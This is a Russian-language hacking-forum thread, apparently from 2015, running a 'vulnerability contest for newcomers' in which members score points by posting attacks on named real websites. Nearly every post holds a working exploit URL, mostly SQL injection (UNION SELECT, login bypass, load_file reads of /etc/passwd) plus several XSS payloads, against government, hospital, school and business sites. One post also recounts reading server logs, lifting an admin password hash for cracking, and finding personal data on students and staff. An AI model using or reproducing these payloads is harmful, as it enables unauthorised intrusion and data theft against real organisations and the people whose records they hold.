Конкурс уязвимостей для новичков

Discussion in 'Песочница' started by yarbabin, 1 Jun 2015.

  1. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    51
    Likes Received:
    21
    Reputations:
    11
    Значит остались самые трудные из списка: XXE и RCE + надо начинать усилено изучать PHP и SQL. Спасибо что поставили меня на путь праведный :D , а то так бы и продолжал морально разлагаться и в игрушки играть.
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    SQL защитано, XSS нет, в конкурсе запрещены ru/ua
     
    _________________________
  3. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
    1)Сайт: http://dogarchive.kennel-apbt.com/
    Уязвимость SQLi
    Эксплойт: http://dogarchive.kennel-apbt.com/php_users/htdocs/login.php?returnto=/index.php
    вписываем:
    логин - ' or 1=1#
    пароль - ' or 1=1 '#
    И видим снизу: Online registred users: admin и т.д

    2) Сайт: http://lineforheaven.com/soul.php?id=174
    Уязвимость: SQLi
    Эксплойт: http://lineforheaven.com/soul.php?i...version(),25,26,27,28,29,30,31,32,33,34,35 --

    3)Сайт: https://www.harptabs.com
    Уязвимость: SQLi
    Эксплойт: https://www.harptabs.com/login.php
    Я нашел логин пользователя на сайте и вписал:
    Логин: Ceja8460' or 1=1#
    Пароль: Ceja8460' or 1=1 '#
    Зашло под логином:
    Welcome, Ceja8460' or 1=1#

    4)Сайт: http://www.ibdb.com/search.php
    Уязвимость: XSS
    Эксплойт: http://www.ibdb.com/search.php
    в поле поиска вписываем: <script>alert('antichat.ru')</script>

    5)Сайт: http://www.kpa.gov.my
    Уязвимость: XSS(в поиску), SQLi
    Єксплойт: http://www.kpa.gov.my/pages.php?mod=search_result
    SQLi не могу развести, да и точно не знаю есть ли она там, вот ссылка:
    http://www.kpa.gov.my/modules/web/page_print.php?id=
     
    #43 semen6192, 29 Jun 2015
    Last edited: 30 Jun 2015
  4. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    51
    Likes Received:
    21
    Reputations:
    11
    Допустим что я нашёл ХХЕ. Как правильно её постить тут и что должно быть в выводе?
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    например, прочитать /etc/passwd. выложить полный запрос (можно перехватить через burp suite, например)
     
    _________________________
  6. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    target: police.gov.bd
    type: SQL Injection
    version: 5.1.69

    Code:
    http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    1) SQL в username, а не в поле пароля.

    admin'or(1)='1
    123

    2) ОК

    3) Не смог разлогиниться, удаление куков не помогло.

    Тоже ошибся в каком-то из полей.

    4) Наверное всё-таки не стоит указывать имя ресурса. Администрация уязвимого ресурса (а они смотрят логи), да и форума, скорее всего, не одобрит.

    5) SQL Inj там нету. Ошибка из NULL в качестве значения переменной.
     
    _________________________
  8. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    XSS уязвимость
    Code:
    http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22http://antichat.ru/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22%3E%3Cscript%3Ealert%28
    /XSS/%29%3C/script%3E
     
  9. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Сайт: http://celtsat.com.br
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
    Сайт: www.albit.com.au
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: nijifan.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: www.apva.org
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: www.th.boots.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: www.shanson.biz
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: www.io-arch.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: www.tokaiguitar.de
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: islamic-wallpapers.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: www.florentina.ro
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: www.pronv.us
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: ravco.jp
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--

    Сайт: www.themasterswoodshop.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
     
    3nvY likes this.
  10. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Сайт:www.themasterswoodshop.com
    Уязвимость: Local File Reading
    Эксплоит:
    Code:
    http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4--
    Сайт:www.io-arch.com
    Уязвимость: Local File Reading
    Эксплоит:
    Code:
    http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9--
    Сайт:www.ravco.jp
    Уязвимость: Local File Reading
    Эксплоит:
    Code:
    http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20--
     
    3nvY likes this.
  11. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Сайт: http://www.thebandroom.biz/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21 and '0'='0
    Сайт:http://www.sacaindia.org/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0
    Сайт:http://www.offball.com/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5
    Сайт:http://www.coolncute.com/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,14&sort=1
    Сайт:http://www.damandiri.or.id/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0
    Сайт:http://www.begeerte.be/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 and '0'='0
    Сайт:http://www.hospitallocaldepiedecuesta.org/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0
    Сайт:http://www.etssp.com/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    Сайт:http://www.worldbarefootcouncil.com/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0
    Сайт:http://www.kulmbacher-tierheim.de/
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9
     
    Га-Ноцри likes this.
  12. O1d

    O1d New Member

    Joined:
    16 Jul 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,email),5,6,7,8,9,10,11,12+from+db_users+limit+2,1--
    
    http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_ws(0x3a,id,email,password,admin_user_level_id,active),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1
    И вот не докрутил тут, глянь, интересно что там http://integra.eu/press.cfm?id=327
     
  13. Abrigen

    Abrigen New Member

    Joined:
    18 Jul 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Сайт: www.marcied.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    добавил
    это добавил.
    это, скорее, sqli с правами на чтение, поэтому защитано как sqli. Добавил +28 очков
    добавил

    sqli гуглится, не добавлена.
     
    _________________________
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    тоже все добавил, вы проходите :)
    у нас уже трое человек попавших через конкурс, @Печа, @3nvY, @ocheretko
     
    _________________________
    ocheretko and Печа like this.
  16. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Сайт Украинского телеканала
    Code:
    http://www.hromadske.tv/search?s=%27;alert%28%27antichat%27%29;//
    Уязвимость интересна новичкам тем, что работает в Chrome - инжект в Javascript var stext1 = '';alert('antichat');//';
     
  17. Abrigen

    Abrigen New Member

    Joined:
    18 Jul 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Сайт: www.gamagroupusa.com
    Уязвимость: Sql inj
    Code:
    http://www.gamagroupusa.com/index.php?i=1+union+select+1,2,3,version()+--+ 
     
  18. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
    Сайт: http://www.karmatube.org
    Уязвимость: XSS
    Эксплоит:
    Code:
    http://www.karmatube.org/videos.php?op=filter&cat=%253Cscript%253Ealert%28%25271%2527%29%253C/script%253E
     
  19. O1d

    O1d New Member

    Joined:
    16 Jul 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    http://www.sicb.org/
    FILE_PRIV=Y
    106 columns :D

    /etc/passwd:
    Code:
    http://www.sicb.org/meetings/2015/schedule/abstractdetails.php?id=199999997 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,load_file(0x2f6574632f706173737764),48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106+from+mysql.user
    Методом ручного фазинга узнаем расположение логов.

    Читаем логи /var/log/httpd/error_log и видим расположение файлов веб-сервера в /var/www/html

    Читаем .htaccess админки из /var/www/html/admin/.htaccess:
    Читаем файл с паролем и брутим:
    Но фейл в админку не пускает, видимо фильтр по IP т.к. бейсик авторизацию уже мы проходим.

    PS БД очень большая в ней 9 БД и инфа начиная с 2002 года о студентах, докторах, профессорах. Дампить не стал.
     
  20. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    Site: http://www.safetylit.org
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.safetylit.org/week/journalpage.php?jid=-1+UNION+SELECT+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
     
Loading...
Similar Threads - Конкурс уязвимостей новичков
  1. zase
    Replies:
    1
    Views:
    3,537
  2. Shadows_God
    Replies:
    14
    Views:
    8,020